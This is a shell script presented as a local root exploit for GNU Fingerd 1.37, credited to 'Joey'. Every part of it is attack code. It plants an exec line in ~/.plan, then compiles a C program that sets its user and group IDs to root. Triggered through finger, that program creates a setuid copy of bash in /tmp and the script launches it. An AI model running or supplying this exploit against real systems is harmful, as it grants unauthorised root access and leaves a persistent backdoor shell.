#!/bin/sh
#
#  GNU Fingerd 1.37 ~/.plan exploit.
#

cat << _EOF1_ >> ~/.plan
  $exec /tmp/relinq
_EOF1_

cat << _EOF2_ >> /tmp/relinq.c
#include <stdio.h>
void main()
{
  printf("Fingerd 1.37 plan Root exploit by Joey\n");
  setregid(0, 0);
  setreuid(0, 0);
  printf("User: %d, Group: %d.\n", getuid(), getgid());
  system("cp /bin/bash /tmp/xxx");
  system("chmod +s /tmp/xxx");
}
_EOF2_
gcc /tmp/relinq.c -o /tmp/relinq
finger $USER
echo "attempting suid shell in /tmp/xxx"
/tmp/xxx